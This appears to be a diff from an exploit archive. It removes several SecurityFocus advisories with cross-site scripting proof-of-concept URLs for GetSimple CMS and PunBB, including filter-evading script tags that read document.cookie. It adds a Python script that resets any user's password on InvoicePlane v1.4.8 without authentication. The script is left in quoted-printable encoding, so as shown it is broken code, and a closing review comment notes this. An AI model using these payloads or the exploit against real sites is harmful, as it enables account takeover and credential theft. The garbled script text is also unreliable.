http://www.example.com/admin/template/error_checking.php?upd=edit-success&ptype=restore&i18n[ER_HASBEEN_REST]=[XSS]
http://www.example.com/admin/template/error_checking.php?upd=edit-success&ptype=delete&i18n[ER_HASBEEN_DEL]=[XSS]
http://www.example.com/admin/template/error_checking.php?upd=edit-success&ptype=delete&i18n[UNDO]=[XSS]
http://www.example.com/admin/template/error_checking.php?upd=edit-index&i18n[ER_CANNOT_INDEX]=[XSS]
http://www.example.com/admin/template/error_checking.php?restored=true&i18n[ER_OLD_RESTORED]=[XSS]
http://www.example.com/admin/template/error_checking.php?upd=pwd-success&i18n[ER_NEW_PWD_SENT]=[XSS]
http://www.example.com/admin/template/error_checking.php?upd=pwd-error&i18n[ER_SENDMAIL_ERR]=[XSS]
http://www.example.com/admin/template/error_checking.php?upd=del-success&i18n[ER_FILE_DEL_SUC]=[XSS]
http://www.example.com/admin/template/error_checking.php?upd=del-error&i18n[ER_PROBLEM_DEL]=[XSS]
http://www.example.com/admin/template/error_checking.php?upd=comp-success&i18n[ER_COMPONENT_SAVE]=[XSS]
http://www.example.com/admin/template/error_checking.php?upd=comp-restored&i18n[ER_COMPONENT_REST]=[XSS]
http://www.example.com/admin/template/error_checking.php?cancel=test&i18n[ER_CANCELLED_FAIL]=[XSS]
http://www.example.com/admin/template/error_checking.php?err=true&msg=[XSS]

@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/49776/info
PunBB is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/browse.php?keywords=[xss]&search=Search&projects=1&styles=1&forums=1

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/53501/info
GetSimple CMS is prone to HTML-injection and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
GetSimple CMS 3.1 is vulnerable; other versions may also be affected.
http://www.example.com/getsimple/admin/theme.php?err=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/53501/info
GetSimple CMS is prone to HTML-injection and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
GetSimple CMS 3.1 is vulnerable; other versions may also be affected.
http://www.example.com/getsimple/admin/pages.php?error=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C

@ -1,10 +0,0 @@
source: http://www.securityfocus.com/bid/53501/info
GetSimple CMS is prone to HTML-injection and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
GetSimple CMS 3.1 is vulnerable; other versions may also be affected.
http://www.example.com/getsimple/admin/index.php?success=%3E%22%3Ciframe%20src=http://www.vulnerability-lab.com%20width=800%20height=800%3E
http://www.example.com/getsimple/admin/index.php?err=%3E%22%3Ciframe%20src=http://www.vulnerability-lab.com%20width=800%20height=800%3E

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/53501/info
GetSimple CMS is prone to HTML-injection and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
GetSimple CMS 3.1 is vulnerable; other versions may also be affected.
http://www.example.com/getsimple/admin/upload.php?path=%3E%22%3Ciframe%20src=http://www.vulnerability-lab.com%20width=800%20height=800%3E&newfolder=rem0ve

@ -1,10 +0,0 @@
source: http://www.securityfocus.com/bid/59600/info
GetSimple CMS is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
GetSimple CMS 3.1.2 is vulnerable; prior versions may also be affected.
http://www.example.com/admin/edit.php?title="><scri<script></script>pt>alert(document.cookie);</scri<script>< /script>pt>
http://www.example.com/admin/edit.php?menu="><scri<script></script>pt>alert(document.cookie);</scri<script></ script>pt>

@ -1,10 +0,0 @@
source: http://www.securityfocus.com/bid/59600/info
GetSimple CMS is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
GetSimple CMS 3.1.2 is vulnerable; prior versions may also be affected.
http://www.example.com/admin/filebrowser.php?path="><scri<script></script>pt>alert(document.cookie);</scri<sc ript></script>pt>
http://www.example.com/admin/filebrowser.php?returnid="><scri<script></script>pt>alert(document.cookie);</scr i<script></script>pt>

platforms/php/webapps/40752.py Executable file
@ -0,0 +1,27 @@
# Exploit Title: InvoicePlane v1.4.8 Incorrect Access Control for password =
reset
# Date: 12-11-2016
# Exploit Author: feedersec
# Contact: feedersec@gmail.com
# Vendor Homepage: https://invoiceplane.com
# Software Link: https://invoiceplane.com/download/v1.4.8
# Version: v1.4.8=20
# Tested on: ubuntu 16.04 LTS
# Description: An unauthenticated user can POST to=20
# /index.php/sessions/passwordreset setting a new password for any user
import urllib2, urllib
#set parameters here
user_id =3D '1'
new_password =3D 'haxor'
baseUrl =3D 'http://localhost/'
####
data =3D urllib.urlencode({'user_id': user_id,=20
=09=09=09 'new_password' : new_password,
=09=09=09 'btn_new_password' : '1'})
req =3D urllib2.Request(baseUrl + 'index.php/sessions/passwordreset', data)
response =3D urllib2.urlopen(req)
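Review bot: The file was committed with its quoted-printable transfer encoding intact, so it is not valid Python: assignments read `user_id =3D '1'`, several lines end in `=20`, the continuation lines of the `urlencode` call start with `=09=09=09`, and the soft line break after `password =` in the title comment leaves `reset` alone on an uncommented line. Decode the message body before committing so the archive holds the text the author submitted. The header also gives no fixed version or vendor advisory reference for the v1.4.8 password reset issue; adding one would let readers tell whether their install is affected.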
